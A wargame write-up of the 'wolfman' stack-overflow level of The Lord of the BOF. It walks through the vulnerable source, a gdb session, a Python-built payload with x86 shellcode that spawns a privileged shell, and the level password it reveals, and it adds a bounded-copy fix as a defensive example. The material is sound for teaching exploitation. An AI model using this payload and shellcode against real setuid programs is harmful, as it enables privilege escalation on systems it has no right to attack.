Getting started
Hello!
This LOB level feels very much like a repeat of the previous ones.
I keep going because I want to get to the ROP problems, but so far these are still simple payload-writing exercises.
Shall we begin?
Write-up
[orc@localhost orc]$ ll
total 84
-rw------- 1 orc orc 61440 May 6 02:09 core
-rwsr-sr-x 1 wolfman wolfman 12587 Feb 26 2010 wolfman
-rw-r--r-- 1 root root 581 Mar 29 2010 wolfman.c
[orc@localhost orc]$
[orc@localhost orc]$ cat wolfman.c
/*
The Lord of the BOF : The Fellowship of the BOF
- wolfman
- egghunter + buffer hunter
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

extern char **environ;

int main(int argc, char *argv[])
{
    char buffer[40];
    int i;

    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }

    // egghunter: wipe every environment string so nothing can be staged there
    for(i=0; environ[i]; i++)
        memset(environ[i], 0, strlen(environ[i]));

    // the overwritten return address must point into the stack (0xbfxxxxxx)
    if(argv[1][47] != '\xbf')
    {
        printf("stack is still your friend.\n");
        exit(0);
    }

    strcpy(buffer, argv[1]);   // unbounded copy: the overflow happens here
    printf("%s\n", buffer);

    // buffer hunter: zero the buffer after the copy
    memset(buffer, 0, 40);
}
Compared with the previous level, a buffer hunter part has been added.
It uses memset to zero the input buffer after the copy.
But we don't keep the shellcode in the buffer anyway!! haha, because there is a wide open area laid out after RET.
The payload should be the same as before.
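A hardened form of the copy in wolfman.c, added here as an example (not the LOB level's own code). It shows why the buffer hunter's memset cannot undo an overflow: strcpy has already run past buffer[40] by the time the memset executes, so the only effective fix is to bound the copy before it happens. The function and enum names are this example's own.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 40   /* same stack buffer size as wolfman.c */
/* Status codes; the names are this example's own, not the level's. */
enum copy_status { COPY_OK = 0, COPY_NO_ARG = 1, COPY_TOO_LONG = 2 };

/* Bounded replacement for strcpy(buffer, argv[1]). The overflow in
 * wolfman.c happens inside strcpy, before the "buffer hunter" memset
 * runs, so zeroing the buffer afterwards cannot repair the saved return
 * address. The fix that works is to refuse oversized input first. */
enum copy_status handle_arg(const char *arg, char *out, size_t out_size)
{
    size_t len = 0;
    if (arg == NULL) return COPY_NO_ARG;
    /* Bounded scan: never read further than the destination can hold. */
    while (len < out_size && arg[len] != '\0')
        len++;
    if (len >= out_size)              /* no room for the terminating NUL */
        return COPY_TOO_LONG;
    memcpy(out, arg, len + 1);
    return COPY_OK;
}

/* Mirrors main() in wolfman.c with the bounded copy; returns the status
 * so a caller or test can check the decision, not just the printout. */
enum copy_status check_input(const char *arg)
{
    char buffer[BUF_SIZE];
    enum copy_status st = handle_arg(arg, buffer, sizeof buffer);
    if (st == COPY_OK)
        printf("%s\n", buffer);
    memset(buffer, 0, sizeof buffer); /* harmless cleanup, not a defence */
    return st;
}

/* Helper for experiments: feeds a string of n 'A' bytes (n < 256). */
enum copy_status check_filled(size_t n)
{
    static char probe[256];
    if (n >= sizeof probe)
        return COPY_TOO_LONG;
    memset(probe, 'A', n);
    probe[n] = '\0';
    return check_input(probe);
}

int main(int argc, char *argv[]) { return (argc > 1 && check_input(argv[1]) == COPY_OK) ? 0 : 1; }
```

A 39-byte argument is accepted, while 40 bytes or more (including the 48-byte payloads this level needs) is refused before any write takes place.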
[orc@localhost orc]$ gdb -q /tmp/wolfman
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x8048500 : push %ebp
0x8048501 <main+1>: mov %ebp,%esp
0x8048503 <main+3>: sub %esp,44
0x8048506 <main+6>: cmp DWORD PTR [%ebp+8],1
0x804850a <main+10>: jg 0x8048523 <main+35>
0x804850c <main+12>: push 0x8048640
0x8048511 <main+17>: call 0x8048410
0x8048516 <main+22>: add %esp,4
0x8048519 <main+25>: push 0
0x804851b <main+27>: call 0x8048420
0x8048520 <main+32>: add %esp,4
0x8048523 <main+35>: nop
0x8048524 <main+36>: mov DWORD PTR [%ebp-44],0x0
0x804852b <main+43>: nop
0x804852c <main+44>: lea %esi,[%esi*1]
0x8048530 <main+48>: mov %eax,DWORD PTR [%ebp-44]
0x8048533 <main+51>: lea %edx,[%eax*4]
0x804853a <main+58>: mov %eax,%ds:0x8049760
0x804853f <main+63>: cmp DWORD PTR [%eax+%edx],0
0x8048543 <main+67>: jne 0x8048547 <main+71>
0x8048545 <main+69>: jmp 0x8048587 <main+135>
0x8048547 <main+71>: mov %eax,DWORD PTR [%ebp-44]
0x804854a <main+74>: lea %edx,[%eax*4]
0x8048551 <main+81>: mov %eax,%ds:0x8049760
0x8048556 <main+86>: mov %edx,DWORD PTR [%eax+%edx]
0x8048559 <main+89>: push %edx
0x804855a <main+90>: call 0x80483f0
0x804855f <main+95>: add %esp,4
0x8048562 <main+98>: mov %eax,%eax
0x8048564 <main+100>: push %eax
0x8048565 <main+101>: push 0
0x8048567 <main+103>: mov %eax,DWORD PTR [%ebp-44]
0x804856a <main+106>: lea %edx,[%eax*4]
0x8048571 <main+113>: mov %eax,%ds:0x8049760
0x8048576 <main+118>: mov %edx,DWORD PTR [%eax+%edx]
0x8048579 <main+121>: push %edx
0x804857a <main+122>: call 0x8048430
0x804857f <main+127>: add %esp,12
0x8048582 <main+130>: inc DWORD PTR [%ebp-44]
0x8048585 <main+133>: jmp 0x8048530 <main+48>
0x8048587 <main+135>: mov %eax,DWORD PTR [%ebp+12]
0x804858a <main+138>: add %eax,4
0x804858d <main+141>: mov %edx,DWORD PTR [%eax]
0x804858f <main+143>: add %edx,47
0x8048592 <main+146>: cmp BYTE PTR [%edx],0xbf
0x8048595 <main+149>: je 0x80485b0 <main+176>
0x8048597 <main+151>: push 0x804864c
0x804859c <main+156>: call 0x8048410
0x80485a1 <main+161>: add %esp,4
0x80485a4 <main+164>: push 0
0x80485a6 <main+166>: call 0x8048420
0x80485ab <main+171>: add %esp,4
0x80485ae <main+174>: mov %esi,%esi
0x80485b0 <main+176>: mov %eax,DWORD PTR [%ebp+12]
0x80485b3 <main+179>: add %eax,4
0x80485b6 <main+182>: mov %edx,DWORD PTR [%eax]
0x80485b8 <main+184>: push %edx
0x80485b9 <main+185>: lea %eax,[%ebp-40]
0x80485bc <main+188>: push %eax
0x80485bd <main+189>: call 0x8048440
0x80485c2 <main+194>: add %esp,8
0x80485c5 <main+197>: lea %eax,[%ebp-40]
0x80485c8 <main+200>: push %eax
0x80485c9 <main+201>: push 0x8048669
0x80485ce <main+206>: call 0x8048410
0x80485d3 <main+211>: add %esp,8
0x80485d6 <main+214>: push 40
0x80485d8 <main+216>: push 0
0x80485da <main+218>: lea %eax,[%ebp-40]
0x80485dd <main+221>: push %eax
0x80485de <main+222>: call 0x8048430
0x80485e3 <main+227>: add %esp,12
0x80485e6 <main+230>: leave
0x80485e7 <main+231>: ret
0x80485e8 <main+232>: nop
0x80485e9 <main+233>: nop
0x80485ea <main+234>: nop
0x80485eb <main+235>: nop
0x80485ec <main+236>: nop
0x80485ed <main+237>: nop
0x80485ee <main+238>: nop
0x80485ef <main+239>: nop
End of assembler dump.
(gdb) b *main+194
Breakpoint 1 at 0x80485c2
(gdb) r `python -c 'print "A" * 44 + "BBB" + "\xbf" + "\x90" * 100 + "CCCC"'`
Starting program: /tmp/wolfman `python -c 'print "A" * 44 + "BBB" + "\xbf" + "\x90" * 100 + "CCCC"'`
Breakpoint 1, 0x80485c2 in main ()
(gdb) x/100wx $esp
0xbffffa84: 0xbffffa90 0xbffffc06 0x00000014 0x41414141
0xbffffa94: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffaa4: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffab4: 0x41414141 0x41414141 0xbf424242 0x90909090
0xbffffac4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffad4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffae4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffaf4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb04: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb14: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb24: 0x43434343 0xbffffe00 0xbffffef2 0xbfffff07
0xbffffb34: 0xbfffff22 0xbfffff2d 0xbfffff39 0xbfffff41
0xbffffb44: 0xbfffff52 0xbfffff5c 0xbfffff6a 0xbfffff7b
0xbffffb54: 0xbfffff89 0xbfffff94 0xbfffffa3 0x00000000
0xbffffb64: 0x00000003 0x08048034 0x00000004 0x00000020
0xbffffb74: 0x00000005 0x00000006 0x00000006 0x00001000
0xbffffb84: 0x00000007 0x40000000 0x00000008 0x00000000
0xbffffb94: 0x00000009 0x08048450 0x0000000b 0x000001f8
0xbffffba4: 0x0000000c 0x000001f8 0x0000000d 0x000001f8
0xbffffbb4: 0x0000000e 0x000001f8 0x00000010 0x0f8bfbff
0xbffffbc4: 0x0000000f 0xbffffbf4 0x00000000 0x00000000
0xbffffbd4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbe4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbf4: 0x36383669 0x6d742f00 0x6f772f70 0x616d666c
0xbffffc04: 0x4141006e 0x41414141 0x41414141 0x41414141
(gdb) q
The program is running. Exit anyway? (y or n) y
[orc@localhost orc]$ ./wolfman `python -c 'print "A" * 44 + "\xd4\xfa\xff\xbf" + "\x90" * 100 + "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒1▒1̀▒É▒1▒F̀1▒Ph//shh/bin▒▒PS▒▒°
̀1▒̀
bash$ id
uid=505(wolfman) gid=504(orc) egid=505(wolfman) groups=504(orc)
bash$ /bin/my-pass
euid = 505
love eyuna
Exploit!!
Wrap-up
Easy!!
Moving on!! Next one!!